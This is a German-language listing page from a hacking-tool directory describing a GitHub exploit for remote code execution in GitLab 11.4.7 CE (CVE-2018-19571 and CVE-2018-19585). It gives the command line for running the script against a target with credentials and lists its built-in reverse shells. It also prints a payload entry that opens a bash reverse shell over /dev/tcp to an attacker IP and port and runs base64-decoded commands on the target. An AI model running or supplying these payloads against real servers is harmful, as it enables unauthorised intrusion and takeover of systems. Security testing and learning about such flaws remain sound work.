Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 RCE-Exploit mit verschiedenen Reverse-Shells. CVE-2018-19571 + CVE-2018-19585 | Kitploit
Tools/GitHubGitHub/algafix/gitlab-rce-11.4.7
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 RCE-Exploit mit verschiedenen Reverse-Shells. CVE-2018-19571 + CVE-2018-19585

Repository anzeigen
33vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

gitlab-RCE-11.4.7

GitLab 11.4.7 CE RCE Exploit mit verschiedenen Reverse Shells.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

Modifikation der Version von Sam Redmond und Tam Lai Yin zum Lernen und Üben.

Verwendung

Es ist in Python3 geschrieben, wie es sich gehört.

Abhängigkeiten:

root@kitploit:~
pip3 install requests

Verwendung:

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

Standardmäßig wird die Netcat-Shell mit der Option -e verwendet.

Eingebaute Shells

Aktuelle eingebaute Shells:

  • nc_e
    • Netcat mit der Option -e.
  • bash:
    • Bash wird mit absolutem Pfad ausgeführt.
  • perl:
    • Perl wird aus dem $PATH ausgeführt.
  • python3:
    • Python3 wird aus dem $PATH ausgeführt.
  • ruby:
    • Ruby wird aus dem $PATH ausgeführt.
  • php:
    • PHP wird aus dem $PATH ausgeführt. Hinweis: Funktioniert normalerweise nicht im GitLab Docker.

Benutzerdefinierte Shells hinzufügen

Manche Shells enthalten Zeichen, die nicht mit der Anfragekodierung kompatibel sind. Daher werden sie in Base64 kodiert und dann auf dem Zielrechner dekodiert und ausgeführt.

Wenn Sie Ihre eigene Shell hinzufügen möchten, fügen Sie einen Wert zur payloads_dict-Struktur hinzu.

Sie müssen Folgendes definieren:

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

Haftungsausschluss

Das HTML-Parsing ist ziemlich fest codiert, es kann leicht brechen.

Tool herunterladen